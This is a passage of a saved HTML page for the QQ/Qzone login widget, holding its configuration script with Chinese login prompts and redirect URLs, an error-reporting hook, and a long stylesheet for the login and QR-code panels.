﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<script>
			! function() {
				window.onerror = function(n, e, o) {
					var t = document.createElement("img"),
						_ = encodeURIComponent(n + "|_|" + e + "|_|" + o + "|_|" + window.navigator.userAgent);
					t.src = "//ui.ptlogin2.qq.com/cgi-bin/report?id=195279&msg=" + _ + "&v=" + Math.random()
				}
			}();
			var g_cdn_js_fail = !1,
				pt = {};
			pt.str = {
				no_uin: "你还没有输入帐号！",
				no_pwd: "你还没有输入密码！",
				no_vcode: "你还没有输入验证码！",
				inv_uin: "请输入正确的帐号！",
				inv_vcode: "请输入完整的验证码！",
				qlogin_expire: "你所选择号码对应的QQ已经失效，请检查该号码对应的QQ是否已经被关闭。",
				other_login: "帐号登录",
				h_pt_login: "帐号密码登录",
				otherqq_login: "QQ帐号密码登录",
				onekey_return: "返回扫码登录"
			}, pt.ptui = {
				s_url: "https\x3A\x2F\x2Fqzs.qzone.qq.com\x2Fqzone\x2Fv5\x2Floginsucc.html\x3Fpara\x3Dizone\x26from\x3Diqq\x26specifyurl\x3Dhttp\x253A\x252F\x252Fuser.qzone.qq.com\x252F920248921\x253Ft\x253D0.6512693474990022",
				proxy_url: "https\x3A\x2F\x2Fqzs.qq.com\x2Fqzone\x2Fv6\x2Fportal\x2Fproxy.html",
				jumpname: encodeURIComponent(""),
				mibao_css: encodeURIComponent(""),
				defaultUin: "",
				lockuin: parseInt("0"),
				href: "https\x3A\x2F\x2Fxui.ptlogin2.qq.com\x2Fcgi-bin\x2Fxlogin\x3Fproxy_url\x3Dhttps\x253A\x2F\x2Fqzs.qq.com\x2Fqzone\x2Fv6\x2Fportal\x2Fproxy.html\x26daid\x3D5\x26\x26hide_title_bar\x3D1\x26low_login\x3D0\x26qlogin_auto_login\x3D1\x26no_verifyimg\x3D1\x26link_target\x3Dblank\x26appid\x3D549000912\x26style\x3D22\x26target\x3Dself\x26s_url\x3Dhttps\x253A\x252F\x252Fqzs.qzone.qq.com\x252Fqzone\x252Fv5\x252Floginsucc.html\x253Fpara\x253Dizone\x2526from\x253Diqq\x2526specifyurl\x253Dhttp\x25253A\x25252F\x25252Fuser.qzone.qq.com\x25252F920248921\x25253Ft\x25253D0.6512693474990022\x26pt_qr_app\x3D\x25E6\x2589\x258B\x25E6\x259C\x25BAQQ\x25E7\x25A9\x25BA\x25E9\x2597\x25B4\x26pt_qr_link\x3Dhttp\x253A\x2F\x2Fz.qzone.com\x2Fdownload.html\x26self_regurl\x3Dhttps\x253A\x2F\x2Fqzs.qq.com\x2Fqzone\x2Fv6\x2Freg\x2Findex.html\x26pt_qr_help_link\x3Dhttp\x253A\x2F\x2Fz.qzone.com\x2Fdownload.html\x26pt_no_auth\x3D0",
				login_sig: "",
				clientip: "",
				serverip: "",
				version: "201203081004",
				ptui_version: encodeURIComponent("10233"),
				isHttps: !1,
				cssPath: "https://ui.ptlogin2.qq.com/style.ssl/40",
				domain: encodeURIComponent("qq.com"),
				fromStyle: parseInt(""),
				pt_3rd_aid: encodeURIComponent("0"),
				appid: encodeURIComponent("549000912"),
				lang: encodeURIComponent("2052"),
				style: encodeURIComponent("40"),
				low_login: encodeURIComponent("0"),
				daid: encodeURIComponent("5"),
				regmaster: encodeURIComponent(""),
				enable_qlogin: "1",
				noAuth: "0",
				target: isNaN(parseInt("0")) ? {
					_top: 1,
					_self: 0,
					_parent: 2
				}["0"] : parseInt("0"),
				csimc: encodeURIComponent("0"),
				csnum: encodeURIComponent("0"),
				authid: encodeURIComponent("0"),
				auth_mode: encodeURIComponent("0"),
				pt_qzone_sig: "0",
				pt_light: "0",
				pt_vcode_v1: "1",
				pt_ver_md5: "000DF67BAAA9A27C4999BC029553DA010378F9B56107BA6CE0AF768B0C",
				gzipEnable: "1"
			};
		</script>
		<style type="text/css" id="main_css">
			body,
			ul {
				margin: 0
			}
			
			html {
				overflow: hidden
			}
			
			body {
				font-family: helvetica, arial, 微软雅黑, 华文黑体;
				font-size: 12px;
				min-height: 305px;
				min-width: 370px
			}
			
			body,
			html {
				height: 100%
			}
			
			ul {
				padding: 0
			}
			
			ul li {
				list-style-type: none
			}
			
			a {
				text-decoration: none
			}
			
			a:hover {
				text-decoration: underline
			}
			
			input[type=text]:focus,
			input[type=password]:focus {
				outline: 0
			}
			
			input::-ms-clear,
			input::-ms-reveal {
				display: none;
				width: 0;
				height: 0
			}
			
			.grayscale {
				-webkit-filter: grayscale(100%);
				-moz-filter: grayscale(100%);
				-ms-filter: grayscale(100%);
				-o-filter: grayscale(100%);
				filter: grayscale(100%);
				filter: url("data:image/svg+xml;utf8,<svg xmlns=\'http://www.w3.org/2000/svg\'><filter id=\'grayscale\'><feColorMatrix type=\'matrix\' values=\'0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0\'/></filter></svg>#grayscale");
				filter: progid:DXImageTransform.Microsoft.BasicImage(grayscale=1)
			}
			
			.uncheck {
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -74px -163px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -74px -163px no-repeat
			}
			
			.checked {
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -92px -163px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -92px -163px no-repeat
			}
			
			.login,
			.login_no_qlogin {
				margin: 0 auto;
				border: 2px solid #eee;
				position: relative;
				height: 100%
			}
			
			.header {
				height: 50px;
				width: 50px;
				position: absolute;
				top: 0;
				right: 0;
				font-family: "微软雅黑";
				z-index: 1000
			}
			
			.header .switch {
				height: 45px;
				position: absolute;
				left: 60px;
				bottom: 0;
				font-size: 16px
			}
			
			.header .switch #switcher_qlogin {
				margin-right: 85px
			}
			
			.header .switch .switch_btn {
				color: #999;
				display: inline-block;
				height: 45px;
				line-height: 45px;
				outline: 0
			}
			
			.header .switch .switch_btn_focus {
				color: #333;
				display: inline-block;
				height: 45px;
				line-height: 45px;
				outline: 0
			}
			
			.header .switch .switch_btn:hover {
				color: #333;
				text-decoration: none
			}
			
			.header .switch .switch_btn_focus:hover {
				text-decoration: none
			}
			
			.header .switch .switch_bottom {
				position: absolute;
				bottom: -1px;
				border-bottom: 2px solid #848484
			}
			
			.header .close {
				width: 47px;
				height: 20px;
				float: right;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -221px -126px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -221px -126px no-repeat;
				outline: 0
			}
			
			.header .close:hover {
				background-position: -221px -151px
			}
			
			.login_no_qlogin .header {
				border: none;
				height: 40px
			}
			
			.login_no_qlogin .header .switch {
				height: 40px;
				position: absolute;
				left: 20px;
				top: 10px;
				font-size: 22px
			}
			
			.login_no_qlogin .header .switch .switch_bottom,
			.login_no_qlogin .header .switch .switch_btn {
				display: none
			}
			
			.login_no_qlogin .header .switch .switch_btn_focus {
				color: #333;
				cursor: default;
				text-decoration: none;
				display: inline-block;
				height: 30px;
				line-height: 30px
			}
			
			.web_login {
				position: relative;
				height: 100%;
				top: 50%;
				margin-top: -150px
			}
			
			.web_login .tips {
				position: relative;
				margin: 0 auto 36px;
				z-index: 11;
				font-size: 16px;
				color: #666;
				text-align: center
			}
			
			.error_tips,
			.loading_tips {
				display: none;
				z-index: 1000;
				position: absolute
			}
			
			.error_tips {
				width: 258px;
				left: 50%;
				margin-left: -129px;
				top: 50%
			}
			
			.error_tips .error_logo {
				position: absolute;
				left: 3px;
				height: 18px;
				line-height: 18px;
				width: 18px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) 0 -162px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) 0 -162px no-repeat
			}
			
			.loading_tips {
				text-align: center;
				height: 24px;
				top: 10px;
				left: 50%;
				margin-left: -28px
			}
			
			.error_tips .err_m {
				display: inline-block;
				padding-left: 24px;
				line-height: 18px;
				color: #ff3b30;
				vertical-align: middle;
				text-align: left
			}
			
			.web_login .operate_tips {
				display: none;
				padding: 8px;
				border: 1px solid #dad699;
				background: #f9f5c7;
				position: absolute;
				bottom: -3px;
				border-radius: 2px
			}
			
			.web_login .operate_tips .tips_link {
				color: #f39800
			}
			
			.web_login .operate_tips .down_row {
				position: absolute;
				bottom: -6px;
				_bottom: -7px;
				left: 20px;
				width: 12px;
				height: 6px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -162px -161px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -162px -161px no-repeat;
				font-size: 1px
			}
			
			.web_login .operate_tips .operate_content {
				width: 100%;
				text-align: left
			}
			
			.web_login .login_form {
				width: 272px;
				margin: 0 auto
			}
			
			.web_login .inputOuter {
				width: 272px;
				height: 42px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -1px -1px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -1px -1px no-repeat
			}
			
			.web_login .inputOuter_focus {
				width: 272px;
				height: 42px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -1px -45px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -1px -45px no-repeat
			}
			
			.web_login .inputstyle {
				width: 258px;
				position: relative;
				top: 2px;
				left: 2px;
				height: 18px;
				padding: 10px 0 10px 10px;
				line-height: 18px;
				border: none;
				background: 0 0;
				color: #333;
				font-family: Verdana, Tahoma, Arial;
				font-size: 16px
			}
			
			.web_login .input_tips,
			.web_login .input_tips_focus {
				position: absolute;
				top: 13px;
				+top: 15px;
				left: 13px;
				font-size: 14px;
				line-height: 16px;
				color: #aaa;
				cursor: text
			}
			
			.web_login .input_tips_focus {
				color: #ddd
			}
			
			.web_login .uinArea {
				height: 55px;
				position: relative;
				z-index: 10
			}
			
			.web_login .uin_del {
				width: 21px;
				height: 21px;
				cursor: pointer;
				position: absolute;
				right: 15px;
				top: 10px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -116px -160px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -116px -160px no-repeat;
				display: none
			}
			
			.bottom,
			.qlogin .nextPage {
				right: 10px
			}
			
			.web_login .uin_del:hover {
				background-position: -139px -160px
			}
			
			.web_login .email_list {
				border: 1px solid #70c2ec;
				background: #fff;
				width: 266px;
				position: absolute;
				z-index: 10;
				display: none;
				border-radius: 1px;
				padding: 1px;
				left: 2px
			}
			
			.web_login .email_list li,
			.web_login .email_list p {
				height: 31px;
				line-height: 31px;
				margin: 0;
				overflow: hidden;
				padding-left: 10px
			}
			
			.web_login .email_list p {
				height: 16px;
				line-height: 10px
			}
			
			.web_login .email_list .hover {
				background: #cbe2fa
			}
			
			.web_login .pwdArea {
				height: 55px;
				position: relative;
				z-index: 3
			}
			
			.web_login .lock_tips {
				position: absolute;
				top: 32px;
				left: -15px;
				height: 16px;
				padding: 5px;
				text-align: center;
				display: none;
				border: 1px solid #dad699;
				background: #f9f5c7;
				border-radius: 2px
			}
			
			.web_login .lock_tips .lock_tips_row {
				position: absolute;
				top: -6px;
				left: 25px;
				width: 12px;
				height: 6px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -162px -168px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -162px -168px no-repeat
			}
			
			.web_login .verifyArea {
				display: none;
				height: 120px;
				position: relative
			}
			
			.web_login .verifyinputArea {
				height: 55px
			}
			
			.web_login .verifycode {
				color: #333;
				font-size: 16px
			}
			
			.web_login .verifyimgArea {
				position: relative;
				height: 55px;
				cursor: pointer
			}
			
			.web_login .verifyimgArea .verifyimg {
				height: 55px;
				width: 150px;
				position: absolute;
				left: 0
			}
			
			.web_login .verifyimgArea .verifyimg_tips {
				position: absolute;
				left: 165px;
				top: 15px;
				color: #000
			}
			
			.web_login .submit {
				position: relative;
				height: 40px;
				background-color: #86ce2f
			}
			
			.web_login .login_button {
				position: absolute;
				left: 0;
				outline: 0;
				width: 100%
			}
			
			.web_login .login_button .btn {
				width: 100%;
				height: 40px;
				line-height: 35px;
				border: none;
				font-size: 17px;
				font-weight: 400;
				font-family: "Microsoft Yahei", "微软雅黑", SimHei, "黑体", "Hiragino Sans GB", STHeiTi, sans-serif;
				color: #fff;
				background: 0 0;
				cursor: pointer
			}
			
			.web_login .login_button:hover .btn {
				background-position: -116px -90px
			}
			
			.web_login .login_button:hover {
				text-decoration: none
			}
			
			.web_login .low_login {
				position: absolute;
				left: 140px;
				top: 10px
			}
			
			.web_login .low_login .checked,
			.web_login .low_login .uncheck {
				float: left;
				height: 18px;
				width: 18px
			}
			
			.web_login .low_login .low_login_wording {
				height: 16px;
				line-height: 16px;
				line-height: 18px\9;
				cursor: pointer;
				margin-left: 5px
			}
			
			.bottom {
				height: 16px;
				margin-bottom: 8px;
				width: 100%;
				position: absolute;
				bottom: 0;
				text-align: right;
				font-size: 12px
			}
			
			.bottom .link {
				color: #666
			}
			
			.bottom .dotted {
				color: #bfbfbf;
				margin: 0 5px
			}
			
			.bottom .vip_link:hover {
				color: red
			}
			
			.bottom .low_login {
				position: absolute;
				bottom: 0;
				left: 20px
			}
			
			.bottom .low_login .checked,
			.bottom .low_login .uncheck {
				float: left;
				height: 18px;
				width: 18px
			}
			
			.bottom .low_login .low_login_wording {
				height: 16px;
				line-height: 16px;
				line-height: 18px\9;
				cursor: pointer;
				margin-left: 5px
			}
			
			.web_qr_login {
				position: relative;
				overflow: hidden;
				height: 100%
			}
			
			.web_qr_login .web_qr_login_show {
				top: 0;
				height: 100%
			}
			
			.noscript {
				background: #F9F5C7;
				border: 1px solid #DAD699;
				display: inline-block;
				height: 24px;
				line-height: 24px;
				padding: 5px;
				text-align: center
			}
			
			.authLogin,
			.hide {
				display: none
			}
			
			.authLogin {
				background: #FFF;
				height: 315px;
				position: absolute;
				top: 0;
				width: 100%;
				z-index: 9999
			}
			
			.authLogin .authHeader {
				height: 50px;
				border-bottom: 1px solid #e2e2e2;
				position: relative;
				font-family: "Hiragino Sans GB", "微软雅黑"
			}
			
			.authLogin .authHeader .title {
				position: absolute;
				top: 5px;
				left: 20px;
				line-height: 30px;
				height: 30px;
				font-size: 22px
			}
			
			.authLogin .authTips {
				height: 30px
			}
			
			.authLogin .authInfo {
				text-align: center
			}
			
			.authLogin .authWording {
				text-align: center;
				color: #A0A0A0;
				line-height: 20px;
				height: 35px
			}
			
			.authLogin .face {
				display: inline-block;
				height: 120px;
				width: 120px;
				text-align: center;
				position: relative;
				cursor: pointer;
				outline: 0
			}
			
			.authLogin .face:focus {
				outline: 0
			}
			
			.authLogin .face:hover {
				border: none;
				text-decoration: none
			}
			
			.authLogin .face img {
				width: 80px;
				height: 80px;
				position: absolute;
				top: 10px;
				left: 19px;
				border: none
			}
			
			.authLogin .face .img_out {
				width: 88px;
				height: 88px;
				position: absolute;
				top: 4px;
				left: 14px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) 0 -182px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) 0 -182px no-repeat
			}
			
			.authLogin .face .img_out_focus,
			.authLogin .face:hover .img_out {
				width: 88px;
				height: 88px;
				position: absolute;
				top: 5px;
				left: 15px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -91px -183px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -91px -183px no-repeat
			}
			
			.authLogin .face .nick {
				display: inline-block;
				text-align: center;
				position: absolute;
				top: 100px;
				left: 0;
				height: 20px;
				line-height: 18px;
				vertical-align: middle;
				width: 100%;
				overflow: hidden;
				color: #6f7479;
				font-family: Tahoma, \u5fae\u8f6f\u96c5\u9ed1, \u5b8b\u4f53, Verdana, Arial, sans-serif
			}
			
			.authLogin .red {
				color: red
			}
			
			.authLogin .face .vip_logo {
				width: 26px;
				height: 12px;
				position: absolute;
				top: 12px;
				left: 21px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -236px -92px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -236px -92px no-repeat
			}
			
			.authLogin .face .uin {
				display: none
			}
			
			.authLogin .face:hover .uin {
				display: block;
				background: #000;
				height: 20px;
				width: 80px;
				line-height: 20px;
				position: absolute;
				left: 20px;
				top: 72px;
				filter: Alpha(opacity=50);
				opacity: .5;
				color: #fff;
				border-radius: 0 0 4px 4px
			}
			
			.authLogin .face .face_mengban {
				background: #000;
				width: 80px;
				height: 80px;
				position: absolute;
				top: 10px;
				left: 20px;
				filter: Alpha(opacity=30);
				opacity: .3
			}
			
			.authLogin .cancleAuthOuter {
				margin-top: 10px;
				text-align: center
			}
			
			.authLogin .cancleAuth {
				display: inline-block;
				height: 14px;
				border: 1px solid #d3d3d3;
				padding: 3px;
				cursor: pointer;
				color: #888;
				text-decoration: none
			}
			
			.authLogin .bottom {
				position: absolute;
				bottom: -2px;
				left: 0;
				width: 100%;
				height: 25px
			}
			
			.authLogin .low_login {
				position: absolute;
				bottom: 0;
				left: 10px
			}
			
			.authLogin .low_login .checked,
			.authLogin .low_login .uncheck {
				float: left;
				height: 18px;
				width: 18px
			}
			
			.authLogin .low_login .low_login_wording {
				height: 16px;
				line-height: 16px;
				line-height: 18px\9;
				cursor: pointer;
				margin-left: 5px
			}
			
			.authLogin .feedback_authLogin {
				position: absolute;
				bottom: 0;
				right: 10px
			}
			
			.qlogin {
				height: 50%;
				top: 50%;
				position: absolute;
				margin: -150px auto 0;
				display: none;
				width: 100%
			}
			
			.qlogin .qlogin_tips {
				color: #666;
				font-size: 16px;
				text-align: center;
				position: relative;
				margin-bottom: 36px;
				zoom: 1
			}
			
			.qlogin .qlogin_select {
				height: 160px;
				position: relative
			}
			
			.qlogin .qlogin_show {
				height: 200px;
				margin-left: 35px;
				margin-right: 35px;
				overflow: hidden;
				position: relative
			}
			
			.qlogin .qlogin_list {
				height: 100%;
				text-align: center;
				position: relative
			}
			
			.qlogin .nextPage,
			.qlogin .prePage {
				width: 25px;
				height: 120px;
				position: absolute;
				top: 70px;
				display: none;
				text-align: center
			}
			
			.qlogin .prePage {
				left: 5px
			}
			
			.qlogin .nextRow,
			.qlogin .preRow {
				width: 16px;
				height: 35px;
				margin-top: 35px
			}
			
			.qlogin .face,
			.qlogin .nextRow,
			.qlogin .preRow {
				display: inline-block;
				cursor: pointer
			}
			
			.qlogin .preRow {
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -181px -185px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -181px -185px no-repeat
			}
			
			.qlogin .prePage:hover .preRow {
				background-position: -181px -228px
			}
			
			.qlogin .nextRow {
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -201px -185px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -201px -185px no-repeat
			}
			
			.qlogin .nextPage:hover .nextRow {
				background-position: -201px -228px
			}
			
			.qlogin .face {
				height: 120px;
				width: 100px;
				text-align: center;
				position: relative;
				outline: 0
			}
			
			.qlogin .face:focus {
				outline: 0
			}
			
			.qlogin .face:hover {
				border: none;
				text-decoration: none
			}
			
			.qlogin .face img {
				width: 80px;
				height: 80px;
				position: absolute;
				top: 10px;
				left: 9px;
				border: none
			}
			
			.qlogin .face .img_out {
				width: 88px;
				height: 88px;
				position: absolute;
				top: 4px;
				left: 4px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) 0 -182px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) 0 -182px no-repeat
			}
			
			.qlogin .face .img_out_focus,
			.qlogin .face:hover .img_out {
				width: 88px;
				height: 88px;
				position: absolute;
				top: 5px;
				left: 5px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -91px -183px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -91px -183px no-repeat
			}
			
			.qlogin .face .nick,
			.qlogin_list .return {
				display: inline-block;
				text-align: center;
				left: 0;
				height: 20px;
				line-height: 18px;
				width: 100%;
				color: #6f7479;
				font-family: Tahoma, Verdana, Arial, sans-serif;
				position: absolute;
				vertical-align: middle;
				overflow: hidden
			}
			
			.qlogin .face .nick {
				top: 100px
			}
			
			.qlogin_list .return {
				top: 120px
			}
			
			.bottom .red,
			.qlogin .face .red {
				color: red
			}
			
			.qlogin .face .vip_logo {
				width: 26px;
				height: 12px;
				position: absolute;
				top: 12px;
				left: 11px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) -236px -92px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) -236px -92px no-repeat
			}
			
			.qlogin .face .onekey_logo {
				width: 12px;
				height: 18px;
				position: absolute;
				bottom: 32px;
				right: 13px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/mobile_icon.png) no-repeat
			}
			
			.qlogin .face .uin,
			.qlogin .face .uin_menban {
				display: none
			}
			
			.qlogin .face:hover .uin,
			.qlogin .face:hover .uin_menban {
				display: block;
				height: 20px;
				line-height: 20px;
				top: 72px;
				width: 80px;
				left: 10px;
				position: absolute
			}
			
			.qlogin .face:hover .uin_menban {
				background: #000;
				filter: Alpha(opacity=50);
				opacity: .5;
				border-radius: 0 0 4px 4px
			}
			
			.qlogin .face:hover .uin {
				color: #fff
			}
			
			.qlogin .face .face_mengban {
				background: #000;
				width: 80px;
				height: 80px;
				position: absolute;
				top: 10px;
				left: 10px;
				filter: Alpha(opacity=30);
				opacity: .3
			}
			
			.qlogin .tips {
				height: 60px;
				margin-top: 20px
			}
			
			.qlogin .tips_logo {
				display: none
			}
			
			.qlogin .err_m {
				display: inline-block;
				height: 18px;
				vertical-align: middle;
				line-height: 18px;
				color: #a0a0a0
			}
			
			.qlogin .loading_tips,
			.qlogin .wording_tips {
				height: 25px;
				text-align: center
			}
			
			.qlogin .loading_tips {
				visibility: hidden
			}
			
			.qlogin .low_login {
				position: absolute;
				left: 12px;
				bottom: 6px;
				height: 18px
			}
			
			.qlogin .low_login .checked,
			.qlogin .low_login .uncheck {
				float: left;
				height: 18px;
				width: 18px
			}
			
			.qlogin .low_login .low_login_wording {
				float: left;
				height: 16px;
				line-height: 16px;
				line-height: 18px\9;
				margin-left: 5px;
				color: #b5bbc1;
				cursor: pointer
			}
			
			.qlogin .qr_0 {
				display: inline-block;
				height: 100%;
				width: 150px;
				text-align: center;
				position: relative
			}
			
			.qlogin .qr_0 a {
				outline: 0
			}
			
			.qlogin .qr_0 .qr_safe_login,
			.qlogin .qr_0 .qr_short_tips {
				display: none
			}
			
			.qlogin .qr_0 .qr_info_link {
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) 0 -541px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) 0 -541px no-repeat;
				color: grey;
				display: inline-block;
				height: 30px;
				line-height: 30px;
				text-decoration: none;
				width: 152px
			}
			
			.qlogin .qr_0 .qr_info_link:hover {
				background-position: 0 -573px;
				text-decoration: none
			}
			
			.qlogin .qr_0 .qr_info_link_en {
				text-decoration: none;
				display: inline-block;
				width: 152px;
				height: 38px;
				line-height: 18px;
				color: grey;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) 0 -606px no-repeat;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) 0 -606px no-repeat
			}
			
			.qlogin .qr_0 .qr_info_link_en:hover {
				background-position: 0 -647px;
				text-decoration: none
			}
			
			.qlogin .qr_0 .qr_safe_tips {
				height: 20px;
				line-height: 20px;
				font-size: 14px;
				font-weight: 700;
				text-align: center;
				margin-left: 5px
			}
			
			.qlogin .qr_0 .qrImg {
				position: absolute;
				height: 130px;
				width: 130px;
				left: 12px;
				border: 1px solid #D3D3D3;
				z-index: 1000
			}
			
			.qlogin .qr_0 .qr_app_name {
				display: inline-block;
				text-align: center;
				position: absolute;
				bottom: 0;
				left: 4px;
				vertical-align: middle;
				width: 100%;
				overflow: hidden
			}
			
			.qlogin .qr_0 .qr_mengban,
			.qlogin .qr_0 .qrlogin_img_out {
				background: #000;
				filter: Alpha(opacity=50);
				height: 134px;
				left: 11px;
				opacity: .5;
				position: absolute;
				width: 134px;
				z-index: 1000
			}
			
			.qlogin .qr_0 .qrlogin_img_out {
				filter: Alpha(opacity=1);
				opacity: .01
			}
			
			.qlogin .qr_0 .qr_invalid_tips {
				color: #FFF;
				cursor: pointer;
				left: 11px;
				line-height: 20px;
				position: absolute;
				text-align: center;
				top: 46px;
				width: 134px;
				z-index: 1000
			}
			
			.qlogin .qr_1 {
				display: inline-block;
				height: 120px;
				width: 100px;
				text-align: center;
				position: relative
			}
			
			.qlogin .qr_1 .qr_info_link,
			.qlogin .qr_1 .qr_info_link_en {
				display: none
			}
			
			.qlogin .qr_1 .qrImg {
				height: 82px;
				left: 12px;
				position: absolute;
				top: 8px;
				width: 82px;
				border: 1px solid #D3D3D3
			}
			
			.qlogin .qr_1 .qr_app_name {
				display: inline-block;
				text-align: center;
				position: absolute;
				top: 100px;
				left: 0;
				height: 20px;
				line-height: 18px;
				vertical-align: middle;
				width: 108px;
				overflow: hidden
			}
			
			.qlogin .qr_1 .qr_app_name a {
				cursor: pointer;
				outline: 0
			}
			
			.qlogin .qr_short_tips {
				color: #3481CF
			}
			
			.qlogin .qr_1 .qr_tips {
				position: absolute;
				top: 30;
				left: 0;
				width: 100px;
				height: 150px;
				display: none
			}
			
			.qlogin .qr_invalid {
				display: none
			}
			
			.qlogin .qr_1 .qr_mengban,
			.qlogin .qr_1 .qrlogin_img_out {
				background: #000;
				width: 84px;
				height: 84px;
				position: absolute;
				top: 8px;
				left: 12px;
				filter: Alpha(opacity=40);
				opacity: .4;
				z-index: 1000
			}
			
			.qlogin .qr_1 .qrlogin_img_out {
				filter: Alpha(opacity=1);
				opacity: .01
			}
			
			.qlogin .qr_1 .qr_invalid_tips {
				color: #FFF;
				cursor: pointer;
				left: 12px;
				line-height: 20px;
				position: absolute;
				text-align: center;
				top: 30px;
				width: 85px;
				z-index: 1000
			}
			
			.onekey_step2,
			.qrlogin_step2 {
				width: 100%;
				left: 0;
				top: 0;
				z-index: 1000;
				display: none
			}
			
			.qlogin .qr_1 .qr_safe_tips {
				display: none
			}
			
			.qrlogin_step2 {
				position: absolute;
				height: 100%;
				background: #fff
			}
			
			.qrlogin_step2 .step2_outer {
				height: 110px;
				margin: 50px 0 0 33px;
				padding: 80px 0 0 115px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_tiny.png) 0 -348px no-repeat #fff;
				_background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/icon_3_8.png) 0 -348px no-repeat #fff
			}
			
			.qrlogin_step2 .qr_h3 {
				text-align: left;
				margin: 0;
				padding-bottom: 20px;
				font-size: 14px;
				font-weight: 700
			}
			
			.qrlogin_step2 .goBack {
				color: #b4b4b4
			}
			
			.qrlogin_step2 .goBack a {
				color: #3481cf
			}
			
			.onekey_step2 {
				background: #fff;
				height: 100%;
				text-align: center;
				position: absolute
			}
			
			.onekey_step2 .outer,
			.qr_tips {
				left: 50%;
				top: 50%;
				position: absolute
			}
			
			.onekey_step2 .outer {
				margin-top: -120px;
				width: 330px;
				margin-left: -165px
			}
			
			.onekey_step2 .container {
				height: 198px;
				padding-left: 115px;
				background: url(//imgcache.qq.com/ptlogin/v4/style/40/images/onekey_tips.png) no-repeat #fff;
				text-align: left
			}
			
			.bottom.center,
			.guanjia,
			.title {
				text-align: center
			}
			
			.onekey_step2 .container .prompt {
				font-size: 16px;
				margin-bottom: 12px
			}
			
			.onekey_step2 .container .operate {
				font-size: 12px;
				margin-bottom: 10px
			}
			
			.onekey_step2 .container .operate a {
				margin-right: 20px
			}
			
			#onekey_tips {
				color: #ff3b30
			}
			
			.qr_tips {
				display: none;
				height: 200px;
				width: 160px;
				z-index: 1999;
				margin-top: -64px;
				margin-left: 12px
			}
			
			.qr_tips .qr_tips_menban {
				opacity: .5;
				filter: alpha(opacity=50);
				background: #fff;
				width: 100%;
				height: 100%
			}
			
			.qr_tips .qr_tips_pic {
				width: 160px;
				height: 198px;
				position: absolute;
				top: 0
			}
			
			.qr_tips .qr_tips_pic_chs,
			.qr_tips .qr_tips_pic_cht,
			.qr_tips .qr_tips_pic_en {
				background: url(//imgcache.qq.com/ptlogin/v4/style/20/images/shouQ_v2/small_24_tiny.png) no-repeat;
				background: url(//imgcache.qq.com/ptlogin/v4/style/20/images/shouQ_v2/small_8.png) no-repeat\9
			}
			
			.newVcodeArea {
				background: #FFF;
				height: 315px;
				position: absolute;
				top: 0;
				width: 100%;
				z-index: 9999;
				display: none
			}
			
			#onekey_verify {
				width: 289px;
				color: #2f3436;
				margin: 12px auto 0;
